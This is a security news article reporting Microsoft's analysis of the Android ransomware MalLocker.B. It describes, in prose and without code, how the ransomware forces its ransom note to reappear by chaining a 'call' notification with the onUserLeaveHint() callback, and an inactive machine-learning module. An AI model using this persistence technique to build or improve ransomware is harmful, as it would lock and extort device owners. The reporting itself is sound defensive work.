Microsoft has identified a new ransomware variant targeting Android devices that uses a variety of innovative techniques to get around the protections that Google has implemented to prevent malicious apps from taking over the home screen and making devices unusable.
The ransomware is a new iteration of a family that has been targeting Android for some time, and Microsoft researchers say the operators behind it have been updating and evolving the malware continuously. Known as AndroidOS/MalLocker.B, the new variant has the ability to respawn the ransom note overlaid on the home screen when the device owner performs certain actions, including pushing the home button. Microsoft researchers said that the variant also contains a small machine-learning module that gives the ransomware the ability to adapt quickly as new defensive techniques arise.
Traditionally, Android ransomware has abused a permission called SYSTEM_ALERT_WINDOW in order to draw a window on the home screen that can’t be removed. That permission is meant to be used by legitimate Android functions to display system alerts, but ransomware operators use it to display the ransom note indefinitely until the victim acquiesces and pays the ransom. Google made some changes to recent versions of Android to prevent malware from using this permission, but malware authors have adapted to employ other tactics.
“For example, some strains of ransomware abuse accessibility features, a method that could easily alarm users because accessibility is a special permission that requires users to go through several screens and accept a warning that the app will be able to monitor activity via accessibility services. Other ransomware families use infinite loops of drawing non-system windows, but in between drawing and redrawing, it’s possible for users to go to settings and uninstall the offending app,” Dinesh Venkatesan of Microsoft Defender Research wrote in a post on the new MalLocker.B ransomware.
But the variant that Microsoft identified does not use any of those techniques. Rather, it uses a special “call” notification that demands the user’s attention immediately, as well as a callback method that is called when the ransomware note is about to be sent to the background.
“The malware connects the dots and uses these two components to create a special type of notification that triggers the ransom screen via the callback,” Venkatesan said.
“The function onUserLeaveHint() is called whenever the malware screen is pushed to background, causing the in-call Activity to be automatically brought to the foreground. Recall that the malware hooked the RansomActivity intent with the notification that was created as a “call” type notification. This creates a chain of events that triggers the automatic pop-up of the ransomware screen without doing infinite redraw or posing as system window.”
Along with those techniques, the MalLocker.B ransomware variant also includes some code that has been forker from a machine-learning library that is used in legitimate apps to resize windows to fit specific screen sizes. The module isn’t yet active in the ransomware code, but it could add some new functionality once it is.
“In the case of this ransomware, using the model would ensure that its ransom note—typically fake police notice or explicit images supposedly found on the device—would appear less contrived and more believable, increasing the chances of the user paying for the ransom,” Venkatesan said.
“The library that uses tinyML is not yet wired to the malware’s functionalities, but its presence in the malware code indicates the intention to do so in future variants.”